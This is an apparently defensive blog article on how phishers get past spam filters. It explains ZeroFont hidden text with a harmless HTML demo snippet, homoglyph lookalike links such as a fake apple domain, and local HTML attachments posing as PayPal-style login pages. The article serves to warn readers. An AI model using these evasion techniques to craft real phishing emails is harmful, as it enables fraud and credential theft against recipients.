The Holy Grail of those sending phishing emails is getting into the recipient’s inbox. Once there, they realize that the recipient (aka potential victim) will at least have to look at their creation before sending it on its way to the spam folder. And maybe, just maybe, they’ll see an interesting subject line and open the email. Then, the greatest of all miracles has a chance to take place. The recipient may want to look at an attached document and, with a few extra moves on the recipient’s part, the document will be opened and malware will be installed on the recipient’s (now victim’s) computer. There are companies whose sole claim is the ability to get a company’s email advertisement (aka spam) into a lucky recipient’s inbox, so the importance of being able to get into an inbox cannot be understated.
Keep in mind that when an email arrives it is automatically analyzed by a spam detecting algorithm (spam filter). Spam filters look for certain giveaways. For example, they are designed to see if the email comes from who it is pretending to be from. If a company’s name in the footer shows no connection to the sender’s email address, the email is directed into the spam folder.
Microsoft natural language processing goes further. It analyzes the text in the email and tries to determine what the writers are up to. In other words, the language processing algorithm tries to determine if the email is some sort of scam. Does it, for example, want the recipient to give up personal information or open a suspicious document? If so, the email is sent to the spam folder, perhaps with some accompanying warning. Enter ZeroFont.
Imagine if a criminal could make the language processor read a different message than the one the recipient sees. That’s what the ZeroFont ploy does. Here’s an example from the Avanan website
The ZeroFont ploy confuses the spam filter by inserting text with a font size set to zero. This was apparently an old technique that most filters were programmed to look for, but not the new Microsoft natural language processor.
In other words, the recipient thinks he or she received a valid email from a valid company. What makes it seem even more valid is that the spam filter didn’t detect anything wrong with it and put it into the inbox. So, if the email has an attachment, such as an invoice, the chances of the recipient opening it are greatly increased.
Here is how the code works. The phisher inserts code which gives the text in the font size = 0 segment to the spam filter while the recipient sees the other text. If you copy and paste the code below into an html testing site like Tryit Editor and push “Run”, you will see what the email recipient sees. (In order to show code in WordPress, it must be put between brackets; therefore, to use this code do not include the brackets at the beginning and end.)
<h1>HE<span style=”FONT-SIZE: 0px”>This is how you hide text with the ZeroFont technique </span>LLO</h1>
<p>I am sending you this phishing email <span style=”FONT-SIZE: 0px”>I can put any nonsense here that will confuse the spam filter </span>to trick you into doing something stupid.</p>
If you do this, you will see the following.
I am sending you this phishing email to trick you into doing something stupid.
The spam filter, however, sees it like this.
HE this is how you hide text with the ZeroFont technique LLO
I am sending you this phishing email I can put any nonsense here that will confuse the spam filter to trick you into doing something stupid.
In an actual scenario, scammers made the recipient see the following email.
Of course, the spam filter saw this message obscured by nonsense words.
But ZeroFont is not the only invisibility trick that is being used. Another trick confuses the spam filter by using non-ASCII characters that look like ASCII characters. The link below seems valid, even if you hover over it in some applications. It will, apparently, fool the Microsoft filter.
If you follow the link you’ll get to a page that looks like this.
The trick is that the ‘l’ in ‘apple’ isn’t really an ‘l’ but some non-ASCII character that looks like an ‘l’. In some fonts, this is more obvious and the link will look something like this: appIe.com. The fake link is harmless in this case, but it could easily have led you to a fake login page or a page that injected malware.
I tested this fake link in both Yahoo and Gmail. Gmail detects an email with the link as spam and even gives this warning.
However, Yahoo allowed the email into my inbox.
The last invisibility trick that is making the rounds and fooling spam filters is an email that includes a link that’s not a link at all. The so-called link is actually an attachment and opens up a file that looks like a real login page. Here is an example.
If you got a well-designed email that seems to be from PayPal with information to follow a link, you may end up on what seems to be a valid login page. Of course, you would have to ignore the “file://” at the beginning of the address. Filling in the information and clicking “Submit” will send the file with its information to the hacker.
The email and its attached file escape detection by encoding any links with something called, Hexadecimal Escape Characters. Any links are, thereby, obscured. Since the attachment doesn’t navigate to another site but opens locally, it will not be detected as malicious, even though it has an html address.
This all means that you need to be careful about any unsolicited emails that enter your inbox. Normal precautions should stop most of these attempts from succeeding. Always check every link and check the address of the page that you may have been led to. And remember, what you don’t see can hurt you.